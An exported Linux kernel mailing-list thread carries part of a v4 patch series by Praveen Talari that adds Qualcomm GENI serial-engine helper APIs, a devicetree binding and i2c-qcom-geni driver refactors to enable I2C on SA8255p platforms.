"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
The GENI SE protocol drivers (I2C, SPI, UART) implement similar resource
activation/deactivation sequences independently, leading to code
duplication.
Introduce geni_se_resources_activate()/geni_se_resources_deactivate() to
power resources on/off. The activate function enables ICC, clocks, and
TLMM, whereas the deactivate function resets the OPP rate and then
disables TLMM, clocks and ICC in reverse order.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3 -> v4
Konrad
- Removed core clk.
v2 -> v3
- Added export symbol for new APIs.
v1 -> v2
Bjorn
- Updated commit message based on code changes.
- Removed geni_se_resource_state() API.
- Utilized code snippet from geni_se_resources_off()
---
drivers/soc/qcom/qcom-geni-se.c | 67 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 ++
2 files changed, 71 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 2e41595ff912..17ab5bbeb621 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -1025,6 +1025,73 @@ int geni_icc_disable(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_disable);
+/**
+ * geni_se_resources_deactivate() - Deactivate GENI SE device resources
+ * @se: Pointer to the geni_se structure
+ *
+ * Deactivates device resources for power saving: OPP rate to 0, pinctrl to
+ * sleep state, clocks off, and interconnect disabled. Skips ACPI devices.
+ *
+ * Return: 0 on success, negative error code on failure
+ */
+int geni_se_resources_deactivate(struct geni_se *se)
+{
+ int ret;
+
+ if (has_acpi_companion(se->dev))
+ return 0;
+
+ if (se->has_opp)
+ dev_pm_opp_set_rate(se->dev, 0);
+
+ ret = pinctrl_pm_select_sleep_state(se->dev);
+ if (ret)
+ return ret;
+
+ geni_se_clks_off(se);
+
+ return geni_icc_disable(se);
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_deactivate);
+
+/**
+ * geni_se_resources_activate() - Activate GENI SE device resources
+ * @se: Pointer to the geni_se structure
+ *
+ * Activates device resources for operation: enables interconnect, prepares clocks,
+ * and sets pin control to default state. Includes error cleanup. Skips ACPI devices.
+ *
+ * Return: 0 on success, negative error code on failure
+ */
+int geni_se_resources_activate(struct geni_se *se)
+{
+ int ret;
+
+ if (has_acpi_companion(se->dev))
+ return 0;
+
+ ret = geni_icc_enable(se);
+ if (ret)
+ return ret;
+
+ ret = geni_se_clks_on(se);
+ if (ret)
+ goto out_icc_disable;
+
+ ret = pinctrl_pm_select_default_state(se->dev);
+ if (ret) {
+ geni_se_clks_off(se);
+ goto out_icc_disable;
+ }
+
+ return ret;
+
+out_icc_disable:
+ geni_icc_disable(se);
+ return ret;
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+
/**
* geni_se_resources_init() - Initialize resources for a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index c182dd0f0bde..36a68149345c 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -541,6 +541,10 @@ int geni_icc_disable(struct geni_se *se);
int geni_se_resources_init(struct geni_se *se);
+int geni_se_resources_activate(struct geni_se *se);
+
+int geni_se_resources_deactivate(struct geni_se *se);
+
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:14 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
The GENI Serial Engine drivers (I2C, SPI, and SERIAL) currently handle
the attachment of power domains individually, which duplicates logic
across the different driver probe functions.
Introduce a new helper API, geni_se_domain_attach(), to centralize
the logic for attaching the "power" and "perf" domains to the GENI SE
device.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4
Konrad
- Updated function documentation
---
drivers/soc/qcom/qcom-geni-se.c | 29 +++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 ++++
2 files changed, 33 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 17ab5bbeb621..d80ae6c36582 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -19,6 +19,7 @@
#include <linux/of_platform.h>
#include <linux/pinctrl/consumer.h>
#include <linux/platform_device.h>
+#include <linux/pm_domain.h>
#include <linux/pm_opp.h>
#include <linux/soc/qcom/geni-se.h>
@@ -1092,6 +1093,34 @@ int geni_se_resources_activate(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+/**
+ * geni_se_domain_attach() - Attach power domains to a GENI SE device.
+ * @se: Pointer to the geni_se structure representing the GENI SE device.
+ *
+ * This function attaches the power domains ("power" and "perf") required
+ * in the SCMI auto-VM environment to the GENI Serial Engine device. It
+ * initializes se->pd_list with the attached domains.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_domain_attach(struct geni_se *se)
+{
+ struct dev_pm_domain_attach_data pd_data = {
+ .pd_flags = PD_FLAG_DEV_LINK_ON,
+ .pd_names = (const char*[]) { "power", "perf" },
+ .num_pd_names = 2,
+ };
+ int ret;
+
+ ret = dev_pm_domain_attach_list(se->dev,
+ &pd_data, &se->pd_list);
+ if (ret <= 0)
+ return -EINVAL;
+
+ return 0;
+}
+EXPORT_SYMBOL_GPL(geni_se_domain_attach);
+
/**
* geni_se_resources_init() - Initialize resources for a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 36a68149345c..5f75159c5531 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -64,6 +64,7 @@ struct geni_icc_path {
* @num_clk_levels: Number of valid clock levels in clk_perf_tbl
* @clk_perf_tbl: Table of clock frequency input to serial engine clock
* @icc_paths: Array of ICC paths for SE
+ * @pd_list: Power domain list for managing power domains
* @has_opp: Indicates if OPP is supported
*/
struct geni_se {
@@ -75,6 +76,7 @@ struct geni_se {
unsigned int num_clk_levels;
unsigned long *clk_perf_tbl;
struct geni_icc_path icc_paths[3];
+ struct dev_pm_domain_list *pd_list;
bool has_opp;
};
@@ -546,5 +548,7 @@ int geni_se_resources_activate(struct geni_se *se);
int geni_se_resources_deactivate(struct geni_se *se);
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
+
+int geni_se_domain_attach(struct geni_se *se);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:15 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
The GENI Serial Engine (SE) drivers (I2C, SPI, and SERIAL) currently
manage performance levels and operating points directly. This results
in code duplication across drivers for tasks such as configuring a
specific level or finding and applying an OPP based on a clock
frequency.
Introduce two new helper APIs, geni_se_set_perf_level() and
geni_se_set_perf_opp(), which give the GENI SE drivers a streamlined
way to find and set the OPP for the desired performance level,
eliminating the redundancy.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 50 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 +++
2 files changed, 54 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index d80ae6c36582..2241d1487031 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -282,6 +282,12 @@ struct se_fw_hdr {
#define geni_setbits32(_addr, _v) writel(readl(_addr) | (_v), _addr)
#define geni_clrbits32(_addr, _v) writel(readl(_addr) & ~(_v), _addr)
+enum domain_idx {
+ DOMAIN_IDX_POWER,
+ DOMAIN_IDX_PERF,
+ DOMAIN_IDX_MAX
+};
+
/**
* geni_se_get_qup_hw_version() - Read the QUP wrapper Hardware version
* @se: Pointer to the corresponding serial engine.
@@ -1093,6 +1099,50 @@ int geni_se_resources_activate(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+/**
+ * geni_se_set_perf_level() - Set performance level for GENI SE.
+ * @se: Pointer to the struct geni_se instance.
+ * @level: The desired performance level.
+ *
+ * Sets the performance level by directly calling dev_pm_opp_set_level
+ * on the performance device associated with the SE.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_set_perf_level(struct geni_se *se, unsigned long level)
+{
+ return dev_pm_opp_set_level(se->pd_list->pd_devs[DOMAIN_IDX_PERF], level);
+}
+EXPORT_SYMBOL_GPL(geni_se_set_perf_level);
+
+/**
+ * geni_se_set_perf_opp() - Set performance OPP for GENI SE by frequency.
+ * @se: Pointer to the struct geni_se instance.
+ * @clk_freq: The requested clock frequency.
+ *
+ * Finds the nearest operating performance point (OPP) for the given
+ * clock frequency and applies it to the SE's performance device.
+ *
+ * Return: 0 on success, or a negative error code on failure.
+ */
+int geni_se_set_perf_opp(struct geni_se *se, unsigned long clk_freq)
+{
+ struct device *perf_dev = se->pd_list->pd_devs[DOMAIN_IDX_PERF];
+ struct dev_pm_opp *opp;
+ int ret;
+
+ opp = dev_pm_opp_find_freq_floor(perf_dev, &clk_freq);
+ if (IS_ERR(opp)) {
+ dev_err(se->dev, "failed to find opp for freq %lu\n", clk_freq);
+ return PTR_ERR(opp);
+ }
+
+ ret = dev_pm_opp_set_opp(perf_dev, opp);
+ dev_pm_opp_put(opp);
+ return ret;
+}
+EXPORT_SYMBOL_GPL(geni_se_set_perf_opp);
+
/**
* geni_se_domain_attach() - Attach power domains to a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 5f75159c5531..c5e6ab85df09 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -550,5 +550,9 @@ int geni_se_resources_deactivate(struct geni_se *se);
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
int geni_se_domain_attach(struct geni_se *se);
+
+int geni_se_set_perf_level(struct geni_se *se, unsigned long level);
+
+int geni_se_set_perf_opp(struct geni_se *se, unsigned long clk_freq);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:16 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
Add DT bindings for the QUP GENI I2C controller on SA8255p platforms.
The SA8255p platform abstracts resources such as clocks, interconnects
and GPIO pin configuration in firmware. The SCMI power and perf
protocols are used to request resource configurations.
The SA8255p platform does not require the Serial Engine (SE) common
properties, as the SE firmware is loaded and managed by the TrustZone
(TZ) secure environment.
Reviewed-by: Krzysztof Kozlowski <krzysztof.kozlowski@oss.qualcomm.com>
Co-developed-by: Nikunj Kela <quic_nkela@quicinc.com>
Signed-off-by: Nikunj Kela <quic_nkela@quicinc.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v2->v3:
- Added Reviewed-by tag
v1->v2:
Krzysztof:
- Added dma properties in example node
- Removed minItems from power-domains property
- Added in commit text about common property
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
diff --git a/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml b/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
new file mode 100644
index 000000000000..a61e40b5cbc1
--- /dev/null
+++ b/Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
@@ -0,0 +1,64 @@
+# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+%YAML 1.2
+---
+$id: http://devicetree.org/schemas/i2c/qcom,sa8255p-geni-i2c.yaml#
+$schema: http://devicetree.org/meta-schemas/core.yaml#
+
+title: Qualcomm SA8255p QUP GENI I2C Controller
+
+maintainers:
+ - Praveen Talari <praveen.talari@oss.qualcomm.com>
+
+properties:
+ compatible:
+ const: qcom,sa8255p-geni-i2c
+
+ reg:
+ maxItems: 1
+
+ dmas:
+ maxItems: 2
+
+ dma-names:
+ items:
+ - const: tx
+ - const: rx
+
+ interrupts:
+ maxItems: 1
+
+ power-domains:
+ maxItems: 2
+
+ power-domain-names:
+ items:
+ - const: power
+ - const: perf
+
+required:
+ - compatible
+ - reg
+ - interrupts
+ - power-domains
+
+allOf:
+ - $ref: /schemas/i2c/i2c-controller.yaml#
+
+unevaluatedProperties: false
+
+examples:
+ - |
+ #include <dt-bindings/interrupt-controller/arm-gic.h>
+ #include <dt-bindings/dma/qcom-gpi.h>
+
+ i2c@a90000 {
+ compatible = "qcom,sa8255p-geni-i2c";
+ reg = <0xa90000 0x4000>;
+ interrupts = <GIC_SPI 357 IRQ_TYPE_LEVEL_HIGH>;
+ dmas = <&gpi_dma0 0 0 QCOM_GPI_I2C>,
+ <&gpi_dma0 1 0 QCOM_GPI_I2C>;
+ dma-names = "tx", "rx";
+ power-domains = <&scmi0_pd 0>, <&scmi0_dvfs 0>;
+ power-domain-names = "power", "perf";
+ };
+...
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:17 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
Move the serial engine setup into a new geni_i2c_init() function for a
cleaner probe function, and use the runtime PM APIs to control
resources instead of direct clock-related APIs for better resource
management.
This makes the serial engine initialization reusable for features such
as hibernation and deep sleep, where the hardware context is lost.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
viken:
- Added Acked-by tag
- Removed extra space before invoke of geni_i2c_init().
v1->v2:
Bjorn:
- Updated commit text.
---
drivers/i2c/busses/i2c-qcom-geni.c | 158 ++++++++++++++---------------
1 file changed, 75 insertions(+), 83 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index ae609bdd2ec4..81ed1596ac9f 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -977,10 +977,77 @@ static int setup_gpi_dma(struct geni_i2c_dev *gi2c)
return ret;
}
+static int geni_i2c_init(struct geni_i2c_dev *gi2c)
+{
+ const struct geni_i2c_desc *desc = NULL;
+ u32 proto, tx_depth;
+ bool fifo_disable;
+ int ret;
+
+ ret = pm_runtime_resume_and_get(gi2c->se.dev);
+ if (ret < 0) {
+ dev_err(gi2c->se.dev, "error turning on device :%d\n", ret);
+ return ret;
+ }
+
+ proto = geni_se_read_proto(&gi2c->se);
+ if (proto == GENI_SE_INVALID_PROTO) {
+ ret = geni_load_se_firmware(&gi2c->se, GENI_SE_I2C);
+ if (ret) {
+ dev_err_probe(gi2c->se.dev, ret, "i2c firmware load failed ret: %d\n", ret);
+ goto err;
+ }
+ } else if (proto != GENI_SE_I2C) {
+ ret = dev_err_probe(gi2c->se.dev, -ENXIO, "Invalid proto %d\n", proto);
+ goto err;
+ }
+
+ desc = device_get_match_data(gi2c->se.dev);
+ if (desc && desc->no_dma_support) {
+ fifo_disable = false;
+ gi2c->no_dma = true;
+ } else {
+ fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
+ }
+
+ if (fifo_disable) {
+ /* FIFO is disabled, so we can only use GPI DMA */
+ gi2c->gpi_mode = true;
+ ret = setup_gpi_dma(gi2c);
+ if (ret)
+ goto err;
+
+ dev_dbg(gi2c->se.dev, "Using GPI DMA mode for I2C\n");
+ } else {
+ gi2c->gpi_mode = false;
+ tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
+
+ /* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
+ if (!tx_depth && desc)
+ tx_depth = desc->tx_fifo_depth;
+
+ if (!tx_depth) {
+ ret = dev_err_probe(gi2c->se.dev, -EINVAL,
+ "Invalid TX FIFO depth\n");
+ goto err;
+ }
+
+ gi2c->tx_wm = tx_depth - 1;
+ geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
+ geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
+ PACKING_BYTES_PW, true, true, true);
+
+ dev_dbg(gi2c->se.dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
+ }
+
+err:
+ pm_runtime_put(gi2c->se.dev);
+ return ret;
+}
+
static int geni_i2c_probe(struct platform_device *pdev)
{
struct geni_i2c_dev *gi2c;
- u32 proto, tx_depth, fifo_disable;
int ret;
struct device *dev = &pdev->dev;
const struct geni_i2c_desc *desc = NULL;
@@ -1060,102 +1127,27 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (ret)
return ret;
- ret = clk_prepare_enable(gi2c->core_clk);
- if (ret)
- return ret;
-
- ret = geni_se_resources_on(&gi2c->se);
- if (ret) {
- dev_err_probe(dev, ret, "Error turning on resources\n");
- goto err_clk;
- }
- proto = geni_se_read_proto(&gi2c->se);
- if (proto == GENI_SE_INVALID_PROTO) {
- ret = geni_load_se_firmware(&gi2c->se, GENI_SE_I2C);
- if (ret) {
- dev_err_probe(dev, ret, "i2c firmware load failed ret: %d\n", ret);
- goto err_resources;
- }
- } else if (proto != GENI_SE_I2C) {
- ret = dev_err_probe(dev, -ENXIO, "Invalid proto %d\n", proto);
- goto err_resources;
- }
-
- if (desc && desc->no_dma_support) {
- fifo_disable = false;
- gi2c->no_dma = true;
- } else {
- fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
- }
-
- if (fifo_disable) {
- /* FIFO is disabled, so we can only use GPI DMA */
- gi2c->gpi_mode = true;
- ret = setup_gpi_dma(gi2c);
- if (ret)
- goto err_resources;
-
- dev_dbg(dev, "Using GPI DMA mode for I2C\n");
- } else {
- gi2c->gpi_mode = false;
- tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
-
- /* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
- if (!tx_depth && desc)
- tx_depth = desc->tx_fifo_depth;
-
- if (!tx_depth) {
- ret = dev_err_probe(dev, -EINVAL,
- "Invalid TX FIFO depth\n");
- goto err_resources;
- }
-
- gi2c->tx_wm = tx_depth - 1;
- geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
- geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
- PACKING_BYTES_PW, true, true, true);
-
- dev_dbg(dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
- }
-
- clk_disable_unprepare(gi2c->core_clk);
- ret = geni_se_resources_off(&gi2c->se);
- if (ret) {
- dev_err_probe(dev, ret, "Error turning off resources\n");
- goto err_dma;
- }
-
- ret = geni_icc_disable(&gi2c->se);
- if (ret)
- goto err_dma;
-
gi2c->suspended = 1;
pm_runtime_set_suspended(gi2c->se.dev);
pm_runtime_set_autosuspend_delay(gi2c->se.dev, I2C_AUTO_SUSPEND_DELAY);
pm_runtime_use_autosuspend(gi2c->se.dev);
pm_runtime_enable(gi2c->se.dev);
+ ret = geni_i2c_init(gi2c);
+ if (ret < 0) {
+ pm_runtime_disable(gi2c->se.dev);
+ return ret;
+ }
+
ret = i2c_add_adapter(&gi2c->adap);
if (ret) {
dev_err_probe(dev, ret, "Error adding i2c adapter\n");
pm_runtime_disable(gi2c->se.dev);
- goto err_dma;
+ return ret;
}
dev_dbg(dev, "Geni-I2C adaptor successfully added\n");
- return ret;
-
-err_resources:
- geni_se_resources_off(&gi2c->se);
-err_clk:
- clk_disable_unprepare(gi2c->core_clk);
-
- return ret;
-
-err_dma:
- release_gpi_dma(gi2c);
-
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:18 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resource operations over SCMI using the power
and performance protocols.
The SCMI power protocol enables or disables resources such as clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states (on/off).
The SCMI performance protocol manages the I2C frequency, with each
frequency represented by a performance level. The driver uses the
geni_se_set_perf_opp() API to request the desired frequency.
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Refactor the resource initialization in geni_i2c_probe() by introducing
a new geni_i2c_resources_init() function and utilizing the common
geni_se_resources_init() framework and clock frequency mapping, making the
probe function cleaner.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
v1->v2:
- Updated commit text.
---
drivers/i2c/busses/i2c-qcom-geni.c | 53 ++++++++++++------------------
1 file changed, 21 insertions(+), 32 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 81ed1596ac9f..56eebefda75f 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -1045,6 +1045,23 @@ static int geni_i2c_init(struct geni_i2c_dev *gi2c)
return ret;
}
+static int geni_i2c_resources_init(struct geni_i2c_dev *gi2c)
+{
+ int ret;
+
+ ret = geni_se_resources_init(&gi2c->se);
+ if (ret)
+ return ret;
+
+ ret = geni_i2c_clk_map_idx(gi2c);
+ if (ret)
+ return dev_err_probe(gi2c->se.dev, ret, "Invalid clk frequency %d Hz\n",
+ gi2c->clk_freq_out);
+
+ return geni_icc_set_bw_ab(&gi2c->se, GENI_DEFAULT_BW, GENI_DEFAULT_BW,
+ Bps_to_icc(gi2c->clk_freq_out));
+}
+
static int geni_i2c_probe(struct platform_device *pdev)
{
struct geni_i2c_dev *gi2c;
@@ -1064,16 +1081,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
desc = device_get_match_data(&pdev->dev);
- if (desc && desc->has_core_clk) {
- gi2c->core_clk = devm_clk_get(dev, "core");
- if (IS_ERR(gi2c->core_clk))
- return PTR_ERR(gi2c->core_clk);
- }
-
- gi2c->se.clk = devm_clk_get(dev, "se");
- if (IS_ERR(gi2c->se.clk) && !has_acpi_companion(dev))
- return PTR_ERR(gi2c->se.clk);
-
ret = device_property_read_u32(dev, "clock-frequency",
&gi2c->clk_freq_out);
if (ret) {
@@ -1088,16 +1095,15 @@ static int geni_i2c_probe(struct platform_device *pdev)
if (gi2c->irq < 0)
return gi2c->irq;
- ret = geni_i2c_clk_map_idx(gi2c);
- if (ret)
- return dev_err_probe(dev, ret, "Invalid clk frequency %d Hz\n",
- gi2c->clk_freq_out);
-
gi2c->adap.algo = &geni_i2c_algo;
init_completion(&gi2c->done);
spin_lock_init(&gi2c->lock);
platform_set_drvdata(pdev, gi2c);
+ ret = geni_i2c_resources_init(gi2c);
+ if (ret)
+ return ret;
+
/* Keep interrupts disabled initially to allow for low-power modes */
ret = devm_request_irq(dev, gi2c->irq, geni_i2c_irq, IRQF_NO_AUTOEN,
dev_name(dev), gi2c);
@@ -1110,23 +1116,6 @@ static int geni_i2c_probe(struct platform_device *pdev)
gi2c->adap.dev.of_node = dev->of_node;
strscpy(gi2c->adap.name, "Geni-I2C", sizeof(gi2c->adap.name));
- ret = geni_icc_get(&gi2c->se, desc ? desc->icc_ddr : "qup-memory");
- if (ret)
- return ret;
- /*
- * Set the bus quota for core and cpu to a reasonable value for
- * register access.
- * Set quota for DDR based on bus speed.
- */
- gi2c->se.icc_paths[GENI_TO_CORE].avg_bw = GENI_DEFAULT_BW;
- gi2c->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
- if (!desc || desc->icc_ddr)
- gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
-
- ret = geni_icc_set_bw(&gi2c->se);
- if (ret)
- return ret;
-
gi2c->suspended = 1;
pm_runtime_set_suspended(gi2c->se.dev);
pm_runtime_set_autosuspend_delay(gi2c->se.dev, I2C_AUTO_SUSPEND_DELAY);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:19 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
|
To manage GENI serial engine resources during runtime power management,
drivers currently need to call functions for ICC, clock, and
SE resource operations in both suspend and resume paths, resulting in
code duplication across drivers.
The new geni_se_resources_activate() and geni_se_resources_deactivate()
helper APIs address this issue by providing a streamlined way to
enable or disable all resources, eliminating the redundancy across
drivers.
Acked-by: Viken Dadhaniya <viken.dadhaniya@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3->v4:
- Added Acked-by tag.
v1->v2:
Bjorn:
- Remove geni_se_resources_state() API.
- Used geni_se_resources_activate() and geni_se_resources_deactivate()
to enable/disable resources.
---
drivers/i2c/busses/i2c-qcom-geni.c | 28 +++++-----------------------
1 file changed, 5 insertions(+), 23 deletions(-)
diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
index 56eebefda75f..4ff84bb0fff5 100644
--- a/drivers/i2c/busses/i2c-qcom-geni.c
+++ b/drivers/i2c/busses/i2c-qcom-geni.c
@@ -1163,18 +1163,15 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
disable_irq(gi2c->irq);
- ret = geni_se_resources_off(&gi2c->se);
+
+ ret = geni_se_resources_deactivate(&gi2c->se);
if (ret) {
enable_irq(gi2c->irq);
return ret;
-
- } else {
- gi2c->suspended = 1;
}
- clk_disable_unprepare(gi2c->core_clk);
-
- return geni_icc_disable(&gi2c->se);
+ gi2c->suspended = 1;
+ return ret;
}
static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
@@ -1182,28 +1179,13 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
int ret;
struct geni_i2c_dev *gi2c = dev_get_drvdata(dev);
- ret = geni_icc_enable(&gi2c->se);
+ ret = geni_se_resources_activate(&gi2c->se);
if (ret)
return ret;
- ret = clk_prepare_enable(gi2c->core_clk);
- if (ret)
- goto out_icc_disable;
-
- ret = geni_se_resources_on(&gi2c->se);
- if (ret)
- goto out_clk_disable;
-
enable_irq(gi2c->irq);
gi2c->suspended = 0;
- return 0;
-
-out_clk_disable:
- clk_disable_unprepare(gi2c->core_clk);
-out_icc_disable:
- geni_icc_disable(&gi2c->se);
-
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:20 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
